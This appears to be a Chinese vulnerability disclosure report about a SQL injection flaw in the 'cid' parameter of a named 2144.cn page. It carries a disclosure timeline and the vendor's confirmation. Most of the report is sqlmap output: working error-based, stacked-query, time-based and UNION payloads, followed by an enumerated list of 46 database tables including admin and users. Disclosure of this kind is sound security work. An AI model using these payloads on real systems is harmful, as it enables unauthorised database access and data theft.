2015-10-01: 细节已通知厂商并且等待厂商处理中 2015-10-08: 厂商已经确认,细节仅向厂商公开 2015-10-18: 细节向核心白帽子及相关领域专家公开 2015-10-28: 细节向普通白帽子公开 2015-11-07: 细节向实习白帽子公开 2015-11-22: 细节向公众公开
厂商很重视这个,再来一发~
http://xm.2144.cn/whole?cid=1
sqlmap resumed the following injection point(s) from stored session:---Parameter: cid (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: cid=1 AND (SELECT 9003 FROM(SELECT COUNT(*),CONCAT(0x7170787071,(SELECT (ELT(9003=9003,1))),0x716b6b6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: cid=1;(SELECT * FROM (SELECT(SLEEP(5)))rzXi)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: cid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZYIs) Type: UNION query Title: Generic UNION query (NULL) - 24 columns Payload: cid=1 UNION ALL SELECT CONCAT(0x7170787071,0x6d4a695853526374436e,0x716b6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web application technology: Nginxback-end DBMS: MySQL 5.0Database: web_2144_news[46 tables]+-----------------------+| group || act_360_card || act_card || act_dice || act_group || act_item || act_msg || act_num || act_peroid || act_qs || act_qs_userip || act_tg || act_wl150529_code || act_wl150529_gold || adcont || admin || attribute || category || category_assignment || category_stat || channel || city || detail || element || element_click || element_extend || element_stat || element_votes || guoqing_score_consume || guoqing_score_user || guoqing_sign || kf || ploy || ploy_consume || ploy_income || ploy_item || ploy_rank || ploy_user || province || search_record || tbl_migration || user_info || users || video || video_relate || video_stat |+-----------------------+
危害等级:中
漏洞Rank:10
确认时间:2015-10-08 13:47
感谢您对2144安全工作的支持
暂无
